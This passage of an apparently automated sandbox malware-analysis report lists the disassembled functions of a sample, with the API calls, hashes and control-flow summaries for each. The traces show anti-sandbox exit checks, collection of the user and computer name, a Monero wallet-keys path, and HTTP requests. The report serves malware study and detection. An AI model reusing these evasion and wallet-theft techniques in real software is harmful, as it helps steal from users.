                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: f20ac8277bb0a3f344fb36d9ff9f50ac5b4a755bbbf6c2b363a624725661c3f6
                            • Instruction ID: 50ac3ec36d8acb1aa2c09a694888f07993cd6af777d1873530390686a8a0f24e
                            • Opcode Fuzzy Hash: f20ac8277bb0a3f344fb36d9ff9f50ac5b4a755bbbf6c2b363a624725661c3f6
                            • Instruction Fuzzy Hash: D0513EB5A0420AEFDF04EFA0DA64ABE77BABF45704F204059E4056B740D770E952DB62
                            Function 00697500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 697500-69754a GetWindowsDirectoryA 1357 69754c 1356->1357 1358 697553-6975c7 GetVolumeInformationA call 698d00 * 3 1356->1358 1357->1358 1365 6975d8-6975df 1358->1365 1366 6975fc-697617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6975e1-6975fa call 698d00 1365->1367 1369 697619-697626 call 69a740 1366->1369 1370 697628-697658 wsprintfA call 69a740 1366->1370 1367->1365 1377 69767e-69768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00697542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0069760A
                            • wsprintfA.USER32 ref: 00697640
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$j
                            • API String ID: 1544550907-1061487577
                            • Opcode ID: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                            • Instruction ID: 973278ff170cfbe322c18ba6ca48d485ac51b659e5dd64a75b86a32bea6ea52c
                            • Opcode Fuzzy Hash: 7482ac05aba658fb4ec23b0a4ec181d9241fa54664e38680b5384cda01aed22b
                            • Instruction Fuzzy Hash: 9B417CB1D04248ABDF10DF94DC85FEEBBB9BF18704F100199F509A7280DB78AA44CBA5
                            Function 006969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A05E8), ref: 006998A1
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0570), ref: 006998BA
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0810), ref: 006998D2
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0828), ref: 006998EA
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0780), ref: 00699903
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A8A10), ref: 0069991B
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013967A0), ref: 00699933
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,01396980), ref: 0069994C
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0708), ref: 00699964
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A05B8), ref: 0069997C
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A06D8), ref: 00699995
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A07B0), ref: 006999AD
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013967C0), ref: 006999C5
                              • Part of subcall function 00699860: GetProcAddress.KERNEL32(75900000,013A0840), ref: 006999DE
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                              • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                              • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                              • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                              • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                              • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                              • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                              • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                              • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                              • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                              • Part of subcall function 00696770: GetUserDefaultLangID.KERNEL32 ref: 00696774
                              • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                              • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                            • Sleep.KERNEL32(00001770), ref: 00696B04
                            • CloseHandle.KERNEL32(?,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                            • ExitProcess.KERNEL32 ref: 00696B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                            • Instruction ID: 8a88e5bffc9ed59d1d36f04bdf959560f74341457ec5d5fe8cf612b988328366
                            • Opcode Fuzzy Hash: 745c9267c832c08cffcdf7ffcf490bf2448e570b142de62ce54f2308fa8e89ae
                            • Instruction Fuzzy Hash: 4C311A70910208AADF44F7E0DD56AEE77BEBF15740F00461CF202A6581DF705905CBAA
                            Function 00681220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 681220-681247 call 6989b0 GlobalMemoryStatusEx 1439 681249-681271 call 69da00 * 2 1436->1439 1440 681273-68127a 1436->1440 1442 681281-681285 1439->1442 1440->1442 1444 68129a-68129d 1442->1444 1445 681287 1442->1445 1447 681289-681290 1445->1447 1448 681292-681294 ExitProcess 1445->1448 1447->1444 1447->1448
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                            • __aulldiv.LIBCMT ref: 00681258
                            • __aulldiv.LIBCMT ref: 00681266
                            • ExitProcess.KERNEL32 ref: 00681294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                            • Instruction ID: ed1a3f6af167de9d9e8255058f6cb231cfea9303e336892257384aa3d2de76ec
                            • Opcode Fuzzy Hash: 6d7a5d875a1c30e75879e893898dec875d45deae6ae5572c5de064726cef8e7e
                            • Instruction Fuzzy Hash: 61014BB0940308AAEF10EBE4CC5AF9EBB7DAB05705F208158E605BA280D67456868799
                            Function 00696AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 696af3 1451 696b0a 1450->1451 1453 696aba-696ad7 call 69aad0 OpenEventA 1451->1453 1454 696b0c-696b22 call 696920 call 695b10 CloseHandle ExitProcess 1451->1454 1459 696ad9-696af1 call 69aad0 CreateEventA 1453->1459 1460 696af5-696b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                            • Sleep.KERNEL32(00001770), ref: 00696B04
                            • CloseHandle.KERNEL32(?,00000000,?,013A8AA0,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                            • ExitProcess.KERNEL32 ref: 00696B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                            • Instruction ID: 8c01fd588db536af2437734a59a8990f06b9cad218f2416c73ffa25e9cda55a6
                            • Opcode Fuzzy Hash: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                            • Instruction Fuzzy Hash: B3F0B830A0030EABEF00ABA0CC0AFBE7B7EFB04304F104519B903A19C4DBB05501DAAA
                            Function 006847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: ad05a9795237afdc4befd08f19ee5c6f4566c7f39a96efd7fd5b3e51b8910a2e
                            • Instruction ID: b1879bff9c4b2e5f4b288045539ce5b20c4d16a34172301aa806dca4462de24d
                            • Opcode Fuzzy Hash: ad05a9795237afdc4befd08f19ee5c6f4566c7f39a96efd7fd5b3e51b8910a2e
                            • Instruction Fuzzy Hash: CB216FB1D00208ABDF14DFA4EC45ADE7B79FB04320F108629F915A72D0EB706A0ACF81
                            Function 006951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                              • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                              • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                            • Instruction ID: 5d5b572b2cc3f9ce8dcfdae00ede409e2a9a880bed4d0adc3af13e6d498735ff
                            • Opcode Fuzzy Hash: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                            • Instruction Fuzzy Hash: C011DD70910148A7CF54FBA4DD52AED73BEAF50340F40416CF81A5A992EF30AB06CB9A
                            Function 006978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                            • Instruction ID: 84f4f5950590af3fcd62e06a685c13f3f40b7809882887ca3e791feb8998aad7
                            • Opcode Fuzzy Hash: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                            • Instruction Fuzzy Hash: 8B0181B1A04208EBDB04DF98DD45FAABBBCFB04B25F10422AFA45E3680C37559008BA1
                            Function 00681110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                            • ExitProcess.KERNEL32 ref: 00681143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                            • Instruction ID: e32114407423f649bf08dcfb2e3fab7e1f295102d62e347a80f8e7a46b24d2ce
